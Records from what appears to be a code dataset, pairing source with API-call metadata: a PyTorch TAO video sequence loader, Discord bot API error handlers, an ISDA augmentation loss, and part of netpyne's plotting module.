dilation (int or None): Number of (original video's) frames to skip between two consecutive
frames in the extracted sequence. See above example if unsure.
If None, will set `dilation = 0`. Default: None
stride (int or None): Number of frames between the first frames of two consecutive extracted sequences.
See above example if unsure. If None, will set `stride = seqlen * (dilation + 1)`
(non-overlapping sequences). Default: None
start (int or None): Index of the frame from which to start extracting sequences for every video.
If None, will start from the first frame. Default: None
end (int): Index of the frame at which to stop extracting sequences for every video.
If None, will continue extracting frames until the end of the video. Default: None
height (int): Spatial height to resize frames to. Default: 480
width (int): Spatial width to resize frames to. Default: 640
return_seg (bool): Determines whether to return instance segmentation labels. Default: True
return_points (bool): Determines whether to return SuperPoint Features. Default: False
return_videonames (bool): Determines whether to return videonames for the sequences. Default: False
"""
def __init__(
self,
basedir: str,
videos: Union[tuple, str, None],
seqlen: int = 4,
dilation: Optional[int] = None,
stride: Optional[int] = None,
start: Optional[int] = None,
end: Optional[int] = None,
height: int = 480,
width: int = 640,
*,
return_img: bool = True,
return_seg: bool = True,
return_points: bool = False,
return_videonames: bool = False,
):
super(TAO, self).__init__()
self.basedir = os.path.normpath(basedir)
if not os.path.isdir(self.basedir):
raise ValueError("Base Directory: {} doesn't exist".format(basedir))
self.height = height
self.width = width
self.return_img = return_img
self.return_seg = return_seg
self.return_points = return_points
self.return_videonames = return_videonames
if not isinstance(seqlen, int):
raise TypeError("seqlen must be int. Got {0}.".format(type(seqlen)))
if not (isinstance(stride, int) or stride is None):
raise TypeError("stride must be int or None. Got {0}.".format(type(stride)))
if not (isinstance(dilation, int) or dilation is None):
raise TypeError(
"dilation must be int or None. Got {0}.".format(type(dilation))
)
dilation = dilation if dilation is not None else 0
stride = stride if stride is not None else seqlen * (dilation + 1)
self.seqlen = seqlen
self.stride = stride
self.dilation = dilation
if seqlen < 0:
raise ValueError("seqlen must be positive. Got {0}.".format(seqlen))
if dilation < 0:
raise ValueError('"dilation" must be positive. Got {0}.'.format(dilation))
if stride < 0:
raise ValueError("stride must be positive. Got {0}.".format(stride))
if not (isinstance(start, int) or start is None):
raise TypeError("start must be int or None. Got {0}.".format(type(start)))
if not (isinstance(end, int) or end is None):
raise TypeError("end must be int or None. Got {0}.".format(type(end)))
start = start if start is not None else 0
self.start = start
self.end = end
if start < 0:
raise ValueError("start must be positive. Got {0}.".format(stride))
if not (end is None or end > start):
raise ValueError(
"end ({0}) must be None or greater than start ({1})".format(end, start)
)
# videos should be a tuple
if isinstance(videos, str):
if os.path.isfile(videos):
with open(videos, "r") as f:
videos = tuple(f.read().split("\n"))
else:
raise ValueError("incorrect filename: {} doesn't exist".format(videos))
elif not (isinstance(videos, tuple)):
msg = "videos should either be path to split.txt or tuple of videos, but was of type %r instead"
raise TypeError(msg % type(videos))
self.RGB_data = []
self.Seg_data = []
self.Points_data = []
self.Videonames_data = []
idx = np.arange(self.seqlen) * (self.dilation + 1)
rgbdir = os.path.join(self.basedir, 'JPEGImages/')
pointsdir = os.path.join(self.basedir, 'points/')
segdir = os.path.join(self.basedir, 'Annotations/')
for video in videos:
file_names = [f for f in sorted(os.listdir(os.path.join(rgbdir, video))) if f.endswith('.jpg')]
rgb_list = [os.path.join(os.path.join(rgbdir, video), x) for x in file_names]
if self.return_points:
points_list = [os.path.join(os.path.join(pointsdir, video), x.replace('.jpg','.pkl')) for x in file_names]
if self.return_seg:
seg_list = [os.path.join(os.path.join(segdir, video), x.replace('.jpg','.png')) for x in file_names]
video_len = len(rgb_list)
for start_index in range(self.start, video_len, self.stride):
if start_index + idx[-1] >= video_len:
break
inds = start_index + idx
self.RGB_data.append([rgb_list[ind] for ind in inds])
if self.return_seg:
self.Seg_data.append([seg_list[ind] for ind in inds])
if self.return_points:
self.Points_data.append([points_list[ind] for ind in inds])
if self.return_videonames:
self.Videonames_data.append(video)
self.num_sequences = len(self.RGB_data)
def __len__(self):
r"""Returns the length of the dataset. """
return self.num_sequences
def __getitem__(self, idx: int):
r"""Returns the data from the sequence at index idx.
Returns:
            color_seq (torch.Tensor): Sequence of RGB images of each frame
seg_seq (torch.Tensor): Sequence of instance segmentation labels for objects present in the frames
points_seq (torch.Tensor): Sequence of SuperPoint Features
videoname (str): Videoname of Sequence
Shape:
- color_seq: :math:`(L, 3, H, W)` where `L` denotes sequence length
- seg_seq: : "math: List of per frame instance segmentations with length `L`
- points_seq: "math: List of SuperPoint Features with length `L`
"""
# Read in the color info.
if self.return_img:
color_seq_path = self.RGB_data[idx]
if self.return_seg:
seg_seq_path = self.Seg_data[idx]
if self.return_points:
points_seq_path = self.Points_data[idx]
color_seq, seg_seq, points_seq = [], [], []
for i in range(self.seqlen):
if self.return_img:
image = cv2.imread(color_seq_path[i])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = torch.from_numpy(image).type(torch.float16)
image = image.permute(2,0,1)
image /= 255
color_seq.append(image)
if self.return_seg:
instance_img = np.array(Image.open(seg_seq_path[i]))
obj_ids = np.unique(instance_img)
obj_ids = obj_ids[~np.isin(obj_ids, [0])]
frame_ann = []
for obj_id in obj_ids:
ann = {}
ann['obj_id'] = obj_id
ann_mask = np.isin(instance_img, obj_id).astype(int)
ann['ann_mask'] = ann_mask
frame_ann.append(ann)
seg_seq.append(frame_ann)
if self.return_points:
with open(points_seq_path[i],'rb') as fp:
points = pickle.load(fp)
points_seq.append(points)
output = []
if self.return_img:
color_seq = torch.stack(color_seq, 0).float()
output.append(color_seq)
if self.return_seg:
output.append(seg_seq)
if self.return_points:
output.append(points_seq)
if self.return_videonames:
output.append(self.Videonames_data[idx])
return tuple(output) | [((3, 0, 3, 20), 'sys.path.append', 'sys.path.append', ({(3, 16, 3, 19): '"""."""'}, {}), "('.')", False, 'import sys\n'), ((77, 23, 77, 48), 'os.path.normpath', 'os.path.normpath', ({(77, 40, 77, 47): 'basedir'}, {}), '(basedir)', False, 'import os\n'), ((141, 17, 141, 58), 'os.path.join', 'os.path.join', ({(141, 30, 141, 42): 'self.basedir', (141, 44, 141, 57): '"""JPEGImages/"""'}, {}), "(self.basedir, 'JPEGImages/')", False, 'import os\n'), ((142, 20, 142, 57), 'os.path.join', 'os.path.join', ({(142, 33, 142, 45): 'self.basedir', (142, 47, 142, 56): '"""points/"""'}, {}), "(self.basedir, 'points/')", False, 'import os\n'), ((143, 17, 143, 59), 'os.path.join', 'os.path.join', ({(143, 30, 143, 42): 'self.basedir', (143, 44, 143, 58): '"""Annotations/"""'}, {}), "(self.basedir, 'Annotations/')", False, 'import os\n'), ((78, 15, 78, 42), 'os.path.isdir', 'os.path.isdir', ({(78, 29, 78, 41): 'self.basedir'}, {}), '(self.basedir)', False, 'import os\n'), ((125, 15, 125, 37), 'os.path.isfile', 'os.path.isfile', ({(125, 30, 125, 36): 'videos'}, {}), '(videos)', False, 'import os\n'), ((139, 14, 139, 36), 'numpy.arange', 'np.arange', ({(139, 24, 139, 35): 'self.seqlen'}, {}), '(self.seqlen)', True, 'import numpy as np\n'), ((205, 24, 205, 53), 'cv2.imread', 'cv2.imread', ({(205, 35, 205, 52): 'color_seq_path[i]'}, {}), '(color_seq_path[i])', False, 'import cv2\n'), ((206, 24, 206, 62), 'cv2.cvtColor', 'cv2.cvtColor', ({(206, 37, 206, 42): 'image', (206, 44, 206, 61): 'cv2.COLOR_BGR2RGB'}, {}), '(image, cv2.COLOR_BGR2RGB)', False, 'import cv2\n'), ((215, 26, 215, 49), 'numpy.unique', 'np.unique', ({(215, 36, 215, 48): 'instance_img'}, {}), '(instance_img)', True, 'import numpy as np\n'), ((147, 37, 147, 64), 'os.path.join', 'os.path.join', ({(147, 50, 147, 56): 'rgbdir', (147, 58, 147, 63): 'video'}, {}), '(rgbdir, video)', False, 'import os\n'), ((214, 40, 214, 67), 'PIL.Image.open', 'Image.open', ({(214, 51, 214, 66): 'seg_seq_path[i]'}, {}), '(seg_seq_path[i])', True, 'import PIL.Image as Image\n'), ((229, 29, 229, 44), 'pickle.load', 'pickle.load', ({(229, 41, 229, 43): 'fp'}, {}), '(fp)', False, 'import pickle\n'), ((234, 24, 234, 49), 'torch.stack', 'torch.stack', ({(234, 36, 234, 45): 'color_seq', (234, 47, 234, 48): '0'}, {}), '(color_seq, 0)', False, 'import torch\n'), ((149, 44, 149, 74), 'os.path.join', 'os.path.join', ({(149, 57, 149, 66): 'pointsdir', (149, 68, 149, 73): 'video'}, {}), '(pointsdir, video)', False, 'import os\n'), ((151, 41, 151, 68), 'os.path.join', 'os.path.join', ({(151, 54, 151, 60): 'segdir', (151, 62, 151, 67): 'video'}, {}), '(segdir, video)', False, 'import os\n'), ((208, 24, 208, 47), 'torch.from_numpy', 'torch.from_numpy', ({(208, 41, 208, 46): 'image'}, {}), '(image)', False, 'import torch\n'), ((146, 55, 146, 82), 'os.path.join', 'os.path.join', ({(146, 68, 146, 74): 'rgbdir', (146, 76, 146, 81): 'video'}, {}), '(rgbdir, video)', False, 'import os\n'), ((216, 35, 216, 56), 'numpy.isin', 'np.isin', ({(216, 43, 216, 50): 'obj_ids', (216, 52, 216, 55): '[0]'}, {}), '(obj_ids, [0])', True, 'import numpy as np\n'), ((222, 31, 222, 60), 'numpy.isin', 'np.isin', ({(222, 39, 222, 51): 'instance_img', (222, 53, 222, 59): 'obj_id'}, {}), '(instance_img, obj_id)', True, 'import numpy as np\n')] |
The-CJ/Phaazebot | Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py | 83a9563d210718071d4e2cdcca3b212c87abaf51 | from typing import TYPE_CHECKING
if TYPE_CHECKING:
from Platforms.Web.main_web import PhaazebotWeb
import json
from aiohttp.web import Response
from Utils.Classes.extendedrequest import ExtendedRequest
async def apiDiscordConfigsQuoteDisabledChannelExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
Disabled quote channel already exists
"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
default_msg:str = "Disabled quote channel already exists"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
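# Illustrative example of the JSON body the handler above produces for hypothetical kwargs
# channel_id="123" and channel_name="general":
#   {"status": 400, "error": "discord_disabled_regularchannel_exists",
#    "channel_id": "123", "channel_name": "general",
#    "msg": "Disabled quote channel already exists for 'general' (Channel ID:123)"}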
async def apiDiscordConfigsQuoteDisabledChannelNotExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
Disabled quote channel does not exists
"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_not_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
default_msg:str = "Disabled quote channel does not exists"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel does not exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
| [((45, 7, 45, 22), 'json.dumps', 'json.dumps', ({(45, 18, 45, 21): 'res'}, {}), '(res)', False, 'import json\n'), ((86, 7, 86, 22), 'json.dumps', 'json.dumps', ({(86, 18, 86, 21): 'res'}, {}), '(res)', False, 'import json\n')] |
RichardScottOZ/sota-data-augmentation-and-optimizers | augmentation/ISDA.py | 60128ca762ac2864a3b54c43c36d1d5aa2033e5a | import torch
import torch.nn as nn
class EstimatorCV():
def __init__(self, feature_num, class_num):
super(EstimatorCV, self).__init__()
self.class_num = class_num
self.CoVariance = torch.zeros(class_num, feature_num, feature_num)#.cuda()
self.Ave = torch.zeros(class_num, feature_num)#.cuda()
self.Amount = torch.zeros(class_num)#.cuda()
def update_CV(self, features, labels):
N = features.size(0)
C = self.class_num
A = features.size(1)
NxCxFeatures = features.view(
N, 1, A
).expand(
N, C, A
)
onehot = torch.zeros(N, C)#.cuda()
onehot.scatter_(1, labels.view(-1, 1), 1)
NxCxA_onehot = onehot.view(N, C, 1).expand(N, C, A)
features_by_sort = NxCxFeatures.mul(NxCxA_onehot)
Amount_CxA = NxCxA_onehot.sum(0)
Amount_CxA[Amount_CxA == 0] = 1
ave_CxA = features_by_sort.sum(0) / Amount_CxA
var_temp = features_by_sort - \
ave_CxA.expand(N, C, A).mul(NxCxA_onehot)
var_temp = torch.bmm(
var_temp.permute(1, 2, 0),
var_temp.permute(1, 0, 2)
).div(Amount_CxA.view(C, A, 1).expand(C, A, A))
sum_weight_CV = onehot.sum(0).view(C, 1, 1).expand(C, A, A)
sum_weight_AV = onehot.sum(0).view(C, 1).expand(C, A)
weight_CV = sum_weight_CV.div(
sum_weight_CV + self.Amount.view(C, 1, 1).expand(C, A, A)
)
weight_CV[weight_CV != weight_CV] = 0
weight_AV = sum_weight_AV.div(
sum_weight_AV + self.Amount.view(C, 1).expand(C, A)
)
weight_AV[weight_AV != weight_AV] = 0
additional_CV = weight_CV.mul(1 - weight_CV).mul(
torch.bmm(
(self.Ave - ave_CxA).view(C, A, 1),
(self.Ave - ave_CxA).view(C, 1, A)
)
)
self.CoVariance = (self.CoVariance.mul(1 - weight_CV) + var_temp
.mul(weight_CV)).detach() + additional_CV.detach()
self.Ave = (self.Ave.mul(1 - weight_AV) + ave_CxA.mul(weight_AV)).detach()
self.Amount += onehot.sum(0)
class ISDALoss(nn.Module):
def __init__(self, feature_num, class_num):
super(ISDALoss, self).__init__()
self.estimator = EstimatorCV(feature_num, class_num)
self.class_num = class_num
self.cross_entropy = nn.CrossEntropyLoss()
def isda_aug(self, fc, features, y, labels, cv_matrix, ratio):
N = features.size(0)
C = self.class_num
A = features.size(1)
weight_m = list(fc.parameters())[0]
NxW_ij = weight_m.expand(N, C, A)
NxW_kj = torch.gather(NxW_ij,
1,
labels.view(N, 1, 1)
.expand(N, C, A))
CV_temp = cv_matrix[labels]
# sigma2 = ratio * \
# torch.bmm(torch.bmm(NxW_ij - NxW_kj,
# CV_temp).view(N * C, 1, A),
# (NxW_ij - NxW_kj).view(N * C, A, 1)).view(N, C)
sigma2 = ratio * \
torch.bmm(torch.bmm(NxW_ij - NxW_kj,
CV_temp),
(NxW_ij - NxW_kj).permute(0, 2, 1))
sigma2 = sigma2.mul(torch.eye(C)#.cuda()
.expand(N, C, C)).sum(2).view(N, C)
aug_result = y + 0.5 * sigma2
return aug_result
def forward(self, model, fc, x, target_x, ratio):
features = model(x)
y = fc(features)
self.estimator.update_CV(features.detach(), target_x)
isda_aug_y = self.isda_aug(fc, features, y, target_x, self.estimator.CoVariance.detach(), ratio)
loss = self.cross_entropy(isda_aug_y, target_x)
return loss, y
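# A training-step sketch (hypothetical names for model, fc, optimizer and data; not part of the
# original module). The ratio is typically annealed with training progress, e.g.
# lambda_0 * (epoch / total_epochs) as in the ISDA paper; that schedule is an assumption here.
def _example_isda_step(criterion, model, fc, optimizer, x, target, epoch, total_epochs, lambda_0=0.5):
    ratio = lambda_0 * epoch / total_epochs
    loss, logits = criterion(model, fc, x, target, ratio)  # criterion is an ISDALoss instance
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    return loss.item(), logits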
| [((9, 26, 9, 74), 'torch.zeros', 'torch.zeros', ({(9, 38, 9, 47): 'class_num', (9, 49, 9, 60): 'feature_num', (9, 62, 9, 73): 'feature_num'}, {}), '(class_num, feature_num, feature_num)', False, 'import torch\n'), ((10, 19, 10, 54), 'torch.zeros', 'torch.zeros', ({(10, 31, 10, 40): 'class_num', (10, 42, 10, 53): 'feature_num'}, {}), '(class_num, feature_num)', False, 'import torch\n'), ((11, 22, 11, 44), 'torch.zeros', 'torch.zeros', ({(11, 34, 11, 43): 'class_num'}, {}), '(class_num)', False, 'import torch\n'), ((23, 17, 23, 34), 'torch.zeros', 'torch.zeros', ({(23, 29, 23, 30): 'N', (23, 32, 23, 33): 'C'}, {}), '(N, C)', False, 'import torch\n'), ((80, 29, 80, 50), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ({}, {}), '()', True, 'import torch.nn as nn\n'), ((105, 27, 106, 45), 'torch.bmm', 'torch.bmm', ({(105, 37, 105, 52): '(NxW_ij - NxW_kj)', (106, 37, 106, 44): 'CV_temp'}, {}), '(NxW_ij - NxW_kj, CV_temp)', False, 'import torch\n'), ((109, 28, 109, 40), 'torch.eye', 'torch.eye', ({(109, 38, 109, 39): 'C'}, {}), '(C)', False, 'import torch\n')] |
sanjayankur31/netpyne | netpyne/plotting/plotter.py | d8b7e94cabeb27e23e30853ff17ae86518b35ac2 | """
Module for plotting analyses
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
from matplotlib.offsetbox import AnchoredOffsetbox
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
class MetaFigure:
"""A class which defines a figure object"""
def __init__(self, kind, sim=None, subplots=None, rcParams=None, autosize=0.35, **kwargs):
if not sim:
from .. import sim
self.sim = sim
self.kind = kind
# Make a copy of the current matplotlib rcParams and update them
self.orig_rcParams = deepcopy(mpl.rcParamsDefault)
if rcParams:
for rcParam in rcParams:
if rcParam in mpl.rcParams:
mpl.rcParams[rcParam] = rcParams[rcParam]
else:
print(rcParam, 'not found in matplotlib.rcParams')
self.rcParams = rcParams
else:
self.rcParams = self.orig_rcParams
# Set up any subplots
if not subplots:
nrows = 1
ncols = 1
elif type(subplots) == int:
nrows = subplots
ncols = 1
elif type(subplots) == list:
nrows = subplots[0]
ncols = subplots[1]
# Create figure
if 'figSize' in kwargs:
figSize = kwargs['figSize']
else:
figSize = self.rcParams['figure.figsize']
if 'dpi' in kwargs:
dpi = kwargs['dpi']
else:
dpi = self.rcParams['figure.dpi']
if autosize:
maxplots = np.max([nrows, ncols])
figSize0 = figSize[0] + (maxplots-1)*(figSize[0]*autosize)
figSize1 = figSize[1] + (maxplots-1)*(figSize[1]*autosize)
figSize = [figSize0, figSize1]
self.fig, self.ax = plt.subplots(nrows, ncols, figsize=figSize, dpi=dpi)
self.plotters = []
def saveFig(self, sim=None, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs):
"""
'eps': 'Encapsulated Postscript',
'jpg': 'Joint Photographic Experts Group',
'jpeg': 'Joint Photographic Experts Group',
'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
"""
if not sim:
from .. import sim
if fileDesc is not None:
fileDesc = '_' + str(fileDesc)
else:
fileDesc = '_' + self.kind
if fileType not in self.fig.canvas.get_supported_filetypes():
raise Exception('fileType not recognized in saveFig')
else:
fileExt = '.' + fileType
if not fileName or not isinstance(fileName, basestring):
fileName = self.sim.cfg.filename + fileDesc + fileExt
else:
if fileName.endswith(fileExt):
fileName = fileName.split(fileExt)[0] + fileDesc + fileExt
else:
fileName = fileName + fileDesc + fileExt
if fileDir is not None:
fileName = os.path.join(fileDir, fileName)
if not overwrite:
while os.path.isfile(fileName):
try:
fileNumStr = fileName.split(fileExt)[0].split('_')[-1]
fileNumStrNew = str(int(fileNumStr) + 1).zfill(2)
fileName = fileName.split('_' + fileNumStr)[0]
except:
fileNumStr = fileNumStrNew = '01'
fileName = fileName.split(fileExt)[0]
fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt
self.fig.savefig(fileName)
self.fileName = fileName
return fileName
def showFig(self, **kwargs):
try:
self.fig.show(block=False)
except:
self.fig.show()
def addSuptitle(self, **kwargs):
self.fig.suptitle(**kwargs)
def finishFig(self, **kwargs):
if 'suptitle' in kwargs:
if kwargs['suptitle']:
self.addSuptitle(**kwargs['suptitle'])
if 'tightLayout' not in kwargs:
plt.tight_layout()
elif kwargs['tightLayout']:
plt.tight_layout()
if 'saveFig' in kwargs:
if kwargs['saveFig']:
self.saveFig(**kwargs)
if 'showFig' in kwargs:
if kwargs['showFig']:
self.showFig(**kwargs)
else:
plt.close(self.fig)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.orig_rcParams)
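# A minimal sketch of driving MetaFigure directly (assumes an initialized netpyne simulation so
# `sim` can be imported by MetaFigure; the 'example' kind and the 2x2 grid are illustrative).
def _example_metafigure_grid():
    metafig = MetaFigure(kind='example', subplots=[2, 2], figSize=(8, 6))
    for ax in metafig.ax.ravel():
        ax.plot([0, 1], [0, 1])
    metafig.finishFig(saveFig=True, showFig=False)
    return metafig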
class GeneralPlotter:
"""A class used for plotting"""
def __init__(self, data, kind, axis=None, sim=None, rcParams=None, metafig=None, **kwargs):
"""
Parameters
----------
data : dict, str
axis : matplotlib axis
            The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available, such as xtwin and ytwin.
"""
self.kind = kind
# Load data
if type(data) == str:
if os.path.isfile(data):
self.data = self.loadData(data)
else:
raise Exception('In Plotter, if data is a string, it must be the path to a data file.')
else:
self.data = data
if not sim:
from .. import sim
self.sim = sim
self.axis = axis
if metafig:
self.metafig = metafig
# If an axis is input, plot there; otherwise make a new figure and axis
if self.axis is None:
final = True
self.metafig = MetaFigure(kind=self.kind, **kwargs)
self.fig = self.metafig.fig
self.axis = self.metafig.ax
else:
self.fig = self.axis.figure
# Attach plotter to its MetaFigure
self.metafig.plotters.append(self)
def loadData(self, fileName, fileDir=None, sim=None):
from ..analysis import loadData
self.data = loadData(fileName=fileName, fileDir=fileDir, sim=None)
def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs):
from ..analysis import saveData as saveFigData
saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs)
def formatAxis(self, **kwargs):
if 'title' in kwargs:
self.axis.set_title(kwargs['title'])
if 'xlabel' in kwargs:
self.axis.set_xlabel(kwargs['xlabel'])
if 'ylabel' in kwargs:
self.axis.set_ylabel(kwargs['ylabel'])
if 'xlim' in kwargs:
if kwargs['xlim'] is not None:
self.axis.set_xlim(kwargs['xlim'])
if 'ylim' in kwargs:
if kwargs['ylim'] is not None:
self.axis.set_ylim(kwargs['ylim'])
if 'invert_yaxis' in kwargs:
if kwargs['invert_yaxis'] is True:
self.axis.invert_yaxis()
def addLegend(self, handles=None, labels=None, **kwargs):
legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map']
# Check for and apply any legend parameters in the kwargs
legendKwargs = {}
for kwarg in kwargs:
if kwarg in legendParams:
legendKwargs[kwarg] = kwargs[kwarg]
# If 'legendKwargs' is found in kwargs, use those values instead of the defaults
if 'legendKwargs' in kwargs:
legendKwargs_new = kwargs['legendKwargs']
for key in legendKwargs_new:
if key in legendParams:
legendKwargs[key] = legendKwargs_new[key]
cur_handles, cur_labels = self.axis.get_legend_handles_labels()
if not handles:
handles = cur_handles
if not labels:
labels = cur_labels
self.axis.legend(handles, labels, **legendKwargs)
def addScalebar(self, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
add_scalebar(self.axis, matchx=matchx, matchy=matchy, hidex=hidex, hidey=hidey, unitsx=unitsx, unitsy=unitsy, scalex=scalex, scaley=scaley, xmax=xmax, ymax=ymax, space=space, **kwargs)
def addColorbar(self, **kwargs):
plt.colorbar(mappable=self.axis.get_images()[0], ax=self.axis, **kwargs)
def finishAxis(self, **kwargs):
self.formatAxis(**kwargs)
if 'saveData' in kwargs:
if kwargs['saveData']:
self.saveData(**kwargs)
if 'dpi' in kwargs:
if kwargs['dpi']:
self.fig.set_dpi(kwargs['dpi'])
if 'figSize' in kwargs:
if kwargs['figSize']:
self.fig.set_size_inches(kwargs['figSize'])
if 'legend' in kwargs:
if kwargs['legend'] is True:
self.addLegend(**kwargs)
elif type(kwargs['legend']) == dict:
self.addLegend(**kwargs['legend'])
if 'scalebar' in kwargs:
if kwargs['scalebar'] is True:
self.addScalebar()
elif type(kwargs['scalebar']) == dict:
self.addScalebar(**kwargs['scalebar'])
if 'colorbar' in kwargs:
if kwargs['colorbar'] is True:
self.addColorbar()
elif type(kwargs['colorbar']) == dict:
self.addColorbar(**kwargs['colorbar'])
if 'grid' in kwargs:
self.axis.minorticks_on()
if kwargs['grid'] is True:
self.axis.grid()
elif type(kwargs['grid']) == dict:
self.axis.grid(**kwargs['grid'])
# If this is the only axis on the figure, finish the figure
if type(self.metafig.ax) != list:
self.metafig.finishFig(**kwargs)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.metafig.orig_rcParams)
class ScatterPlotter(GeneralPlotter):
"""A class used for scatter plotting"""
def __init__(self, data, axis=None, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'scatter'
self.x = data.get('x')
self.y = data.get('y')
self.s = data.get('s')
self.c = data.get('c')
self.marker = data.get('marker')
self.linewidth = data.get('linewidth')
self.cmap = data.get('cmap')
self.norm = data.get('norm')
self.alpha = data.get('alpha')
self.linewidths = data.get('linewidths')
def plot(self, **kwargs):
scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths)
self.finishAxis(**kwargs)
return self.fig
class LinePlotter(GeneralPlotter):
"""A class used for plotting one line per subplot"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'line'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
def plot(self, **kwargs):
linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha)
self.finishAxis(**kwargs)
return self.fig
class LinesPlotter(GeneralPlotter):
"""A class used for plotting multiple lines on the same axis"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'lines'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
self.label = data.get('label')
def plot(self, **kwargs):
numLines = len(self.y)
if type(self.color) != list:
colors = [self.color for line in range(numLines)]
else:
colors = self.color
if type(self.marker) != list:
markers = [self.marker for line in range(numLines)]
else:
markers = self.marker
if type(self.markersize) != list:
markersizes = [self.markersize for line in range(numLines)]
else:
markersizes = self.markersize
if type(self.linewidth) != list:
linewidths = [self.linewidth for line in range(numLines)]
else:
linewidths = self.linewidth
if type(self.alpha) != list:
alphas = [self.alpha for line in range(numLines)]
else:
alphas = self.alpha
if self.label is None:
labels = [None for line in range(numLines)]
else:
labels = self.label
for index, line in enumerate(self.y):
self.axis.plot(
self.x,
self.y[index],
color=colors[index],
marker=markers[index],
markersize=markersizes[index],
linewidth=linewidths[index],
alpha=alphas[index],
label=labels[index],
)
self.finishAxis(**kwargs)
return self.fig
class HistPlotter(GeneralPlotter):
"""A class used for histogram plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'histogram'
self.x = data.get('x')
self.bins = data.get('bins', None)
self.range = data.get('range', None)
self.density = data.get('density', False)
self.weights = data.get('weights', None)
self.cumulative = data.get('cumulative', False)
self.bottom = data.get('bottom', None)
self.histtype = data.get('histtype', 'bar')
self.align = data.get('align', 'mid')
self.orientation = data.get('orientation', 'vertical')
self.rwidth = data.get('rwidth', None)
self.log = data.get('log', False)
self.color = data.get('color', None)
self.alpha = data.get('alpha', None)
self.label = data.get('label', None)
self.stacked = data.get('stacked', False)
self.data = data.get('data', None)
def plot(self, **kwargs):
